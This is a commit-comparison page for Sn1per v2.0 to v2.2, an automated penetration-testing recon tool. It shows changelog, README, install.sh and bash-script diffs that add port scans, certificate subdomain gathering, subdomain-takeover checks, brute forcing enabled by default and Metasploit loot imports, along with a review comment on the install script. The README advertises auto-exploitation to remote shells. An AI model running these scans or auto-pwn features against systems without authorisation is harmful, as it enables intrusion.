Compare commits


5 Commits
v2.0 ... v2.2

Author SHA1 Message Date
root
e7564e82f4 Sn1per by 1N3@CrowdShield 2016-11-30 10:29:40 -05:00
root
83c4e9f1e7 Sn1per by 1N3@CrowdShield 2016-11-23 12:34:55 -05:00
root
24a24a65cd Sn1per by 1N3@CrowdShield 2016-10-27 11:22:10 -04:00
root
11d72969e3 Sn1per by 1N3@CrowdShield 2016-10-17 13:32:45 -04:00
root
0dd5ce9056 Sn1per by 1N3@CrowdShield 2016-10-14 16:20:42 -04:00
4 changed files with 279 additions and 67 deletions


@@ -1,4 +1,22 @@
## CHANGELOG: ## CHANGELOG:
* v2.2 - Added auto Metasploit Pro & Zenmap GUI integration
* v2.2 - Added Sn1per workspaces to loot directory
* v2.1d - Added crt.sh sub-domain check
* v2.1d - Removed blank screenshots from loot directory
* v2.1c - Fixed issue with install.sh install directories
* v2.1b - Added automatic Metasploit NMap xml imports for loot directory
* v2.1b - Removed Zenmap
* v2.1a - Separated Arachni reports for port 80/443/tcp
* v2.1a - Fixed NMap full port scan options
* v2.1 - Added Arachni with auto HTML web reporting (web mode only)
* v2.1 - Added full NMap detailed port scans
* v2.1 - Added port 4443/tcp checks
* v2.1 - Added META tag scans for web apps
* v2.1 - Removed Uniscan from web mode
* v2.1 - Removed SQLMap from web mode
* v2.0b - Added help option --help
* v2.0a - Fixed issue with ssh-audit
* v2.0a - Fixed issue with 'discover' mode
* v2.0 - Updated sub-domain takeover list * v2.0 - Updated sub-domain takeover list
* v2.0 - Improved scan performance for stealth, airstrike and discover modes * v2.0 - Improved scan performance for stealth, airstrike and discover modes
* v2.0 - Removed jexboss due to clear screen issue with output * v2.0 - Removed jexboss due to clear screen issue with output
@@ -106,4 +124,4 @@
* v1.4 - Removed debug output from goohak from displaying on console * v1.4 - Removed debug output from goohak from displaying on console
## FUTURE: ## FUTURE:
* Add scan config options to enabled/disable certain scan tasks (ie. brute force, osint, web scans, etc.) * Add scan config options to enabled/disable certain scan tasks (ie. brute force, osint, web scans, etc.)


@@ -19,6 +19,8 @@ Sn1per is an automated scanner that can be used during a penetration test to enu
* Automatically exploit remote hosts to gain remote shell access * Automatically exploit remote hosts to gain remote shell access
* Performs high level enumeration of multiple hosts * Performs high level enumeration of multiple hosts
* Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
* Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
* Create individual workspaces to store all scan output
## KALI LINUX INSTALL: ## KALI LINUX INSTALL:
``` ```
@@ -61,7 +63,7 @@ sniper loot
* **NOBRUTE:** Launches a full scan against a target host/domain without brute forcing services. * **NOBRUTE:** Launches a full scan against a target host/domain without brute forcing services.
* **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
* **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
* **LOOT:** Automatically organizes and displays loot folder in your browser and opens Zenmap GUI with all port scan results. To run, type 'sniper loot'. * **LOOT:** Automatically organizes and displays loot folder in your browser and opens Metasploit Pro and Zenmap GUI with all port scan results. To run, type 'sniper loot'.
## SAMPLE REPORT: ## SAMPLE REPORT:
https://gist.github.com/1N3/8214ec2da2c91691bcbc https://gist.github.com/1N3/8214ec2da2c91691bcbc


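--- a/install.sh
+++ b/install.sh
@@ -19,18 +19,25 @@ echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
 echo ""
 INSTALL_DIR=/usr/share/sniper
+LOOT_DIR=/usr/share/sniper/loot
 PLUGINS_DIR=/usr/share/sniper/plugins
 echo -e "$OKGREEN + -- --=[This script will install sniper under $INSTALL_DIR. Are you sure you want to continue?$RESET"
 read answer
 mkdir -p $INSTALL_DIR 2> /dev/null
+mkdir -p $LOOT_DIR 2> /dev/null
+mkdir $LOOT_DIR/domains 2> /dev/null
+mkdir $LOOT_DIR/screenshots 2> /dev/null
+mkdir $LOOT_DIR/nmap 2> /dev/null
+mkdir $LOOT_DIR/reports 2> /dev/null
+mkdir $LOOT_DIR/output 2> /dev/null
 cp -Rf $PWD/* $INSTALL_DIR
 cd $INSTALL_DIR
 echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
 apt-get install ruby rubygems python dos2unix zenmap sslyze uniscan xprobe2 cutycapt unicornscan waffit host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
-pip install dnspython colorama tldextract urllib3 ipaddress
+pip install dnspython colorama tldextract urllib3 ipaddress arachni
 echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET"
 gem install rake
@@ -38,7 +45,7 @@ gem install ruby-nmap net-http-persistent mechanize text-table
 echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET"
 rm -Rf Findsploit/ BruteX/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ serializekiller/ testssl.sh/ SimpleEmailSpoofer/ ssh-audit/ plugins/ 2> /dev/null
-mkdir /usr/share/sniper/plugins/
+mkdir $PLUGINS_DIR
 cd $PLUGINS_DIR
 echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"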
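Review bot: The new `LOOT_DIR=/usr/share/sniper/loot` line directly under `INSTALL_DIR=` repeats the literal install prefix instead of deriving it, which is the same duplication the second hunk removes when `mkdir /usr/share/sniper/plugins/` becomes `mkdir $PLUGINS_DIR`; prefer `LOOT_DIR="$INSTALL_DIR/loot"` so the two cannot drift apart. The six new `mkdir ... 2> /dev/null` lines also discard every failure, so a non-writable prefix or a pre-existing file at one of those paths is only noticed later when scan output cannot be written; they can be collapsed into one checked call, `mkdir -p -- "$LOOT_DIR"/{domains,screenshots,nmap,reports,output} || exit 1`. As far as I can tell Arachni is a Ruby gem rather than a Python package, so appending `arachni` to the `pip install` line will most likely fail (and, because nothing checks pip's status, fail silently); if a PyPI package of that name is not intended, it belongs with the `gem install` lines that follow. Since this tree lives under `/usr/share`, the loot directories are created with the default umask and are readable by every local account on a shared host; passing `-m 0750` (or a stricter umask for the install) keeps scan results and reports out of other users' reach.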

311
sniper

@@ -1,5 +1,5 @@
#!/bin/bash #!/bin/bash
# + -- --=[Sn1per v2.0 by 1N3 # + -- --=[Sn1per v2.2 by 1N3
# + -- --=[http://crowdshield.com # + -- --=[http://crowdshield.com
# #
# Sn1per - Automated Pentest Recon Tool # Sn1per - Automated Pentest Recon Tool
@@ -20,15 +20,15 @@
# ./install.sh - Installs all dependencies. Best run from Kali Linux. # ./install.sh - Installs all dependencies. Best run from Kali Linux.
# #
# USAGE: # USAGE:
# ./sniper <target> # sniper <target>
# ./sniper <target> <report> # sniper <target> <report>
# ./sniper <CIDR> discover <report> # sniper <CIDR> discover <report>
# ./sniper <target> stealth <report> # sniper <target> stealth <report>
# ./sniper <target> port <portnum> # sniper <target> port <portnum>
# ./sniper <target> web <report> # sniper <target> web <report>
# ./sniper <targets.txt> airstrike <report> # sniper <targets.txt> airstrike <report>
# ./sniper <targets.txt> nuke <report> # sniper <targets.txt> nuke <report>
# ./sniper loot # sniper loot
# #
TARGET="$1" TARGET="$1"
@@ -53,12 +53,115 @@ OKORANGE='\033[93m'
RESET='\e[0m' RESET='\e[0m'
REGEX='^[0-9]+$' REGEX='^[0-9]+$'
cd $INSTALL_DIR
# ENABLE/DISABLE AUTOMATIC BRUTE FORCE # ENABLE/DISABLE AUTOMATIC BRUTE FORCE
# DEFAULT IS "1" (ENABLED) # DEFAULT IS "1" (ENABLED)
AUTOBRUTE="1" AUTOBRUTE="1"
# ENABLE/DISABLE FULL DETAILED NMAP SCAN
# DEFAULT IS "1" (ENABLED)
FULLNMAPSCAN="1"
cd $INSTALL_DIR
function loot {
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo ""
echo -e "$OKORANGE + -- --=[Current workspaces..."
cd $LOOT_DIR
ls -lh $LOOT_DIR/workspace/
echo -e "$OKORANGE + -- --=[Enter a name for the workspace:"
read WORKSPACE
mkdir -p $LOOT_DIR/workspace/$WORKSPACE 2> /dev/null
echo -e "$OKORANGE + -- --=[Generating reports..."
for a in `ls sniper-*.txt 2>/dev/null`;
do
echo "$a" > $LOOT_DIR/reports/$a
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a
mv $a $LOOT_DIR/output/
done
echo -e "$OKORANGE + -- --=[Removing blank web screenshots..."
find /usr/share/sniper/loot/screenshots/ -size -10k -exec rm -f {} \; 2> /dev/null
rm -f $LOOT_DIR/.fuse_* 2> /dev/null
echo -e "$OKORANGE + -- --=[Starting Metasploit service..."
/etc/init.d/metasploit start 2> /dev/null
echo -e "$OKORANGE + -- --=[Importing NMap XML files into Metasploit..."
msfconsole -x "workspace -a $WORKSPACE; workspace $WORKSPACE; db_import $LOOT_DIR/nmap/nmap*.xml; hosts; services; exit;"
echo -e "$OKORANGE + -- --=[Copying loot to workspace: $WORKSPACE..."
cp -Rf $LOOT_DIR/screenshots/ $LOOT_DIR/workspace/$WORKSPACE/screenshots/ 2> /dev/null
cp -Rf $LOOT_DIR/nmap/ $LOOT_DIR/workspace/$WORKSPACE/nmap/ 2> /dev/null
cp -Rf $LOOT_DIR/domains/ $LOOT_DIR/workspace/$WORKSPACE/domains/ 2> /dev/null
cp -Rf $LOOT_DIR/output/ $LOOT_DIR/workspace/$WORKSPACE/output/ 2> /dev/null
cp -Rf $LOOT_DIR/reports/ $LOOT_DIR/workspace/$WORKSPACE/reports/ 2> /dev/null
cp -Rf $LOOT_DIR/imports/ $LOOT_DIR/workspace/$WORKSPACE/imports/ 2> /dev/null
cp -Rf $LOOT_DIR/notes/ $LOOT_DIR/workspace/$WORKSPACE/notes/ 2> /dev/null
cp -Rf $LOOT_DIR/web/ $LOOT_DIR/workspace/$WORKSPACE/web/ 2> /dev/null
rm -Rf $LOOT_DIR/screenshots/ 2> /dev/null
rm -Rf $LOOT_DIR/nmap/ 2> /dev/null
rm -Rf $LOOT_DIR/domains/ 2> /dev/null
rm -Rf $LOOT_DIR/output/ 2> /dev/null
rm -Rf $LOOT_DIR/reports/ 2> /dev/null
rm -Rf $LOOT_DIR/imports/ 2> /dev/null
rm -Rf $LOOT_DIR/notes/ 2> /dev/null
rm -Rf $LOOT_DIR/web/ 2> /dev/null
mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null
mkdir $LOOT_DIR/nmap -p 2> /dev/null
mkdir $LOOT_DIR/domains -p 2> /dev/null
mkdir $LOOT_DIR/output -p 2> /dev/null
mkdir $LOOT_DIR/reports -p 2> /dev/null
mkdir $LOOT_DIR/imports -p 2> /dev/null
mkdir $LOOT_DIR/notes -p 2> /dev/null
mkdir $LOOT_DIR/web -p 2> /dev/null
echo -e "$OKORANGE + -- --=[Opening workspace directory..."
iceweasel $LOOT_DIR/workspace/$WORKSPACE 2> /dev/null &
echo -e "$OKORANGE + -- --=[Launching Metasploit Pro Web UI..."
iceweasel http://localhost:3001/login 2> /dev/null &
echo -e "$OKORANGE + -- --=[Launching Zenmap..."
zenmap -f $LOOT_DIR/workspace/$WORKSPACE/nmap/ 2> /dev/null &
echo -e "$OKORANGE + -- --=[Done!"
}
function help {
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo ""
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3$RESET"
echo -e "$OKORANGE + -- --=[Usage:"
echo ""
echo ' [*] sniper <target> <report>'
echo ' [*] sniper <target> stealth <report>'
echo ' [*] sniper <CIDR> discover'
echo ' [*] sniper <target> port <portnum> '
echo ' [*] sniper <target> web <report>'
echo ' [*] sniper <target> nobrute <report>'
echo ' [*] sniper <targets.txt> airstrike <report>'
echo ' [*] sniper <targets.txt> nuke <report>'
echo ' [*] sniper loot'
echo ""
echo ' + -- --=[Modes:'
echo ''
echo ' + -- --=[REPORT: Outputs all results to text in the loot directory for later reference. To enable reporting, append report to any sniper mode or command.'
echo ' + -- --=[STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking'
echo ' + -- --=[DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.'
echo ' + -- --=[PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.'
echo ' + -- --=[WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.'
echo ' + -- --=[NOBRUTE: Launches a full scan against a target host/domain without brute forcing services.'
echo ' + -- --=[AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.'
echo ' + -- --=[NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.'
echo -e " + -- --=[LOOT: Automatically organizes and displays loot folder in your browser and opens Zenmap GUI with all port scan results. To run, type sniper loot.$RESET"
echo ""
echo ""
}
if [ -z $TARGET ]; then if [ -z $TARGET ]; then
echo -e "$OKRED ____ $RESET" echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET" echo -e "$OKRED _________ / _/___ ___ _____$RESET"
@@ -68,35 +171,16 @@ if [ -z $TARGET ]; then
echo -e "$OKRED /_/ $RESET" echo -e "$OKRED /_/ $RESET"
echo -e "" echo -e ""
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET" echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3$RESET" echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3$RESET"
echo -e "$OKORANGE + -- --=[Usage: sn1per <target>$RESET" echo -e "$OKORANGE + -- --=[Usage: sniper <target>$RESET"
echo "" echo ""
exit exit
fi fi
function loot { if [[ $TARGET = "--help" ]]; then
echo -e "$OKRED ____ $RESET" help
echo -e "$OKRED _________ / _/___ ___ _____$RESET" exit
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" fi
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo ""
cd $LOOT_DIR
echo -e "$OKORANGE + -- --=[Sorting loot directory ($LOOT_DIR)"
echo -e "$OKORANGE + -- --=[Generating reports..."
for a in `ls sniper-*.txt 2>/dev/null`;
do
echo "$a" > $LOOT_DIR/reports/$a
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a
mv $a $LOOT_DIR/output/
done
rm -f $LOOT_DIR/.fuse_* 2> /dev/null
echo -e "$OKORANGE + -- --=[Opening loot directory..."
iceweasel $LOOT_DIR &> /dev/null &
zenmap -f $LOOT_DIR/nmap/ &> /dev/null &
echo -e "$OKORANGE + -- --=[Done!"
}
if [[ ${TARGET:0:1} =~ $REGEX ]]; if [[ ${TARGET:0:1} =~ $REGEX ]];
then then
@@ -105,8 +189,6 @@ else
SCAN_TYPE="DOMAIN" SCAN_TYPE="DOMAIN"
fi fi
#clear
if [ "$MODE" = "report" ]; then if [ "$MODE" = "report" ]; then
sniper $TARGET | tee $LOOT_DIR/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1 sniper $TARGET | tee $LOOT_DIR/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1
exit exit
@@ -138,7 +220,7 @@ if [ "$MODE" = "discover" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Checking ARP Cache]=---------------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Checking ARP Cache]=---------------------- -- +$RESET"
arp -a -n arp -a -n
echo -e "$OKGREEN + -- ----------------------------=[Running Port Discovery Scan]=------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Running Port Discovery Scan]=------------- -- +$RESET"
unicornscan $TARGET -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt unicornscan $TARGET -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt
echo -e "$OKGREEN + -- ----------------------------=[Current Targets]=------------------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Current Targets]=------------------------- -- +$RESET"
cat $LOOT_DIR/domains/sniper-ips.txt cat $LOOT_DIR/domains/sniper-ips.txt
echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET"
@@ -176,7 +258,7 @@ if [ "$MODE" = "stealth" ]; then
echo -e "$OKRED /_/ $RESET" echo -e "$OKRED /_/ $RESET"
echo -e "$RESET" echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com" echo -e "$OKORANGE + -- --=[http://crowdshield.com"
echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3" echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3"
echo -e "$OKRED " echo -e "$OKRED "
echo -e "$OKRED ./\." echo -e "$OKRED ./\."
echo -e "$OKRED ./ '\." echo -e "$OKRED ./ '\."
@@ -220,18 +302,31 @@ if [ "$MODE" = "stealth" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
dig -x $TARGET dig -x $TARGET
dnsenum $TARGET dnsenum $TARGET
mv -f *_ips.txt $LOOT_DIR/ 2>/dev/null mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
python Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
echo ""
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
echo -e "$OKBLUE"
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-crt.txt"
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
rm -f /tmp/curl.out 2> /dev/null
echo -e "$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot" 2>/dev/null; done; for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot" 2>/dev/null; done;
echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
python SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
fi fi
echo "" echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
@@ -273,7 +368,21 @@ if [ "$MODE" = "stealth" ]; then
fi fi
echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
loot echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
exit exit
fi fi
@@ -291,7 +400,7 @@ if [ "$MODE" = "airstrike" ]; then
echo -e "$OKRED /_/ $RESET" echo -e "$OKRED /_/ $RESET"
echo -e "$RESET" echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com" echo -e "$OKORANGE + -- --=[http://crowdshield.com"
echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3" echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3"
for a in `cat $TARGET`; for a in `cat $TARGET`;
do do
@@ -342,16 +451,29 @@ if [ "$MODE" = "airstrike" ]; then
dnsenum $a dnsenum $a
mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
python Sublist3r/sublist3r.py -d $a -vvv -o $LOOT_DIR/domains/domains-$a.txt 2>/dev/null python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $a -vvv -o $LOOT_DIR/domains/domains-$a.txt 2>/dev/null
dos2unix $LOOT_DIR/domains/domains-$a.txt 2>/dev/null dos2unix $LOOT_DIR/domains/domains-$a.txt 2>/dev/null
echo ""
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
echo -e "$OKBLUE"
curl -s https://crt.sh/?q=%25.$a > /tmp/curl.out && cat /tmp/curl.out | grep $a | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$a-crt.txt && cat $LOOT_DIR/domains/domains-$a-crt.txt
echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-crt.txt"
cat $LOOT_DIR/domains/domains-$a-crt.txt > /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$a.txt >> /tmp/curl.out 2> /dev/null
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$a-full.txt
rm -f /tmp/curl.out 2> /dev/null
echo -e "$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
for b in `cat $LOOT_DIR/domains/domains-$a.txt 2> /dev/null`; do dig $b CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done; for b in `cat $LOOT_DIR/domains/domains-$a.txt 2> /dev/null`; do dig $b CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done;
echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
python SimpleEmailSpoofer/spoofcheck.py $a 2>/dev/null python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $a 2>/dev/null
fi fi
echo "" echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running port scan]=------------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Running port scan]=------------------- -- +$RESET"
nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a -oX $LOOT_DIR/nmap/nmap-$a.xml nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a -oX $LOOT_DIR/nmap/nmap-$a.xml
port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$a.xml | grep open` port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$a.xml | grep open` port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
@@ -391,7 +513,6 @@ if [ "$MODE" = "airstrike" ]; then
fi fi
